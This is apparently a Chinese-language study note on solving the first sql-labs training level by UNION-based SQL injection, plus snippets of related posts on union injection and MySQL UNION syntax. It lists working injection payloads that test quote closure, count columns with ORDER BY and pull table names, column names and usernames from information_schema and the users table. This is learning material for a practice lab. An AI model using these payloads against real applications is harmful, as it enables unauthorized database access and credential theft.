聯合查詢有前提 必須有顯示位
用sql-labs來學習
這是第乙個
一、判斷是否用'做字串引號
'and 1=1 --+
正常輸出
出錯代表沒有閉合 說明沒有用' 可能沒有用' 或用了"或()
則是''字串注入
二、判斷它所在的資料庫有幾列
'order by 3 --+ 判斷是否有3列
正常'order by 4 --+ 判斷是否有4列
錯誤說明它輸出的內容所在的資料庫有3列
四、判斷他顯示的內容在資料庫的第幾列
則 your login name 在第二列
your password在第三列
我選擇在第二列輸出我想要的內容
五、查詢出當前使用者許可權
root許可權
六、查詢當前資料庫
當前資料庫是 security
七、查詢security的表名
' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema ='security'),3 --+
表名是
emails,referers,uagents,users
八 、查詢users裡的字段
' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'),3 --+
九、查詢使用者名稱
' union select 1,(select group_concat(username) from security.users),3 --+
十、查詢密碼
這樣 這個就完成了 已經拿到了賬號密碼
這是我做的盲注
sql注入 union聯合查詢注入
目錄 一,sql注入必記的一庫三表 二,union聯合查詢注入 1,基本注入流程 1,判斷注入點 2,判斷多少列 3,判斷顯示位 4,顯示資料庫的基本資訊 5,顯示有哪些資料庫 6,顯示資料庫下有哪些表 7,判斷表裡有哪些字段 八,查詢資料表中有哪些資料 information schema 資料庫...
union聯合注入
方式一 首先嘗試id 1 and 1 1 或者id 1 and 1 1 或者1 and 1 1 或者 1 and 1 1 注釋符,假如是id 1 and 1 1 那麼and 1 1 就是我們可控的點 接下來在這個位置進行替換就好 id 1 order by 4 判斷字段個數,從order by 1 ...
mysql聯合查詢union
將多條查詢結果合併成乙個結果 查詢語句1 union all 查詢語句2 查詢部門編號 90或郵箱包含a的員工資訊 select from employees where email like a or department id 90 或者 select from employees where ...